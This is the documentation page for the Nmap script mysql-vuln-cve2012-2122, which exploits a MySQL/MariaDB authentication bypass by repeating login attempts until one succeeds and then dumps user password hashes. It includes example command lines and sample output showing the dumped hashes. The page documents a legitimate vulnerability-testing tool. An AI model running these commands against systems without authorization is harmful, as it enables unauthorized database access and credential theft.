Script mysql-vuln-cve2012-2122

Script types: portrule
Categories: discovery, intrusive, vuln
Download: https://svn.nmap.org/nmap/scripts/mysql-vuln-cve2012-2122.nse

Script Summary

Attempts to bypass authentication in MySQL and MariaDB servers by exploiting CVE2012-2122. If its vulnerable, it will also attempt to dump the MySQL usernames and password hashes.

All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable but exploitation depends on whether memcmp() returns an arbitrary integer outside of -128..127 range.

"When a user connects to MariaDB/MySQL, a token (SHA over a password and a random scramble string) is calculated and compared with the expected value. Because of incorrect casting, it might've happened that the token and the expected value were considered equal, even if the memcmp() returned a non-zero value. In this case MySQL/MariaDB would think that the password is correct, even while it is not. Because the protocol uses random strings, the probability of hitting this bug is about 1/256. Which means, if one knows a user name to connect (and "root" almost always exists), she can connect using *any* password by repeating connection attempts. ~300 attempts takes only a fraction of second, so basically account password protection is as good as nonexistent."

Original public advisory:

• http://seclists.org/oss-sec/2012/q2/493

Interesting post about this vuln:

• https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql

Script Arguments

mysql-vuln-cve2012-2122.pass

MySQL password. Default: nmapFTW.

mysql-vuln-cve2012-2122.user

MySQL username. Default: root.

mysql-vuln-cve2012-2122.iterations

Connection retries. Default: 1500.

mysql-vuln-cve2012-2122.socket_timeout

Socket timeout. Default: 5s.

vulns.short, vulns.showall

See the documentation for the vulns library.

Example Usage

• nmap -p3306 --script mysql-vuln-cve2012-2122 <target>

• nmap -sV --script mysql-vuln-cve2012-2122 <target>
  

Script Output

PORT     STATE SERVICE REASON
3306/tcp open  mysql   syn-ack
| mysql-vuln-cve2012-2122:
|   VULNERABLE:
|   Authentication bypass in MySQL servers.
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-2122
|     Description:
|       When a user connects to MariaDB/MySQL, a token (SHA
|       over a password and a random scramble string) is calculated and compared
|       with the expected value. Because of incorrect casting, it might've
|       happened that the token and the expected value were considered equal,
|       even if the memcmp() returned a non-zero value. In this case
|       MySQL/MariaDB would think that the password is correct, even while it is
|       not.  Because the protocol uses random strings, the probability of
|       hitting this bug is about 1/256.
|       Which means, if one knows a user name to connect (and "root" almost
|       always exists), she can connect using *any* password by repeating
|       connection attempts. ~300 attempts takes only a fraction of second, so
|       basically account password protection is as good as nonexistent.
|
|     Disclosure date: 2012-06-9
|     Extra information:
|       Server granted access at iteration #204
|     root:*9CFBBC772F3F6C106020035386DA5BBBF1249A11
|     debian-sys-maint:*BDA9386EE35F7F326239844C185B01E3912749BF
|     phpmyadmin:*9CFBBC772F3F6C106020035386DA5BBBF1249A11
|     References:
|       https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
|       http://seclists.org/oss-sec/2012/q2/493
|_      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122

Requires

• mysql
• nmap
• shortport
• stdnse
• string
• vulns
• openssl

---

Author:

• Paulino Calderon <calderon@websec.mx>

License: Same as Nmap--See https://nmap.org/book/man-legal.html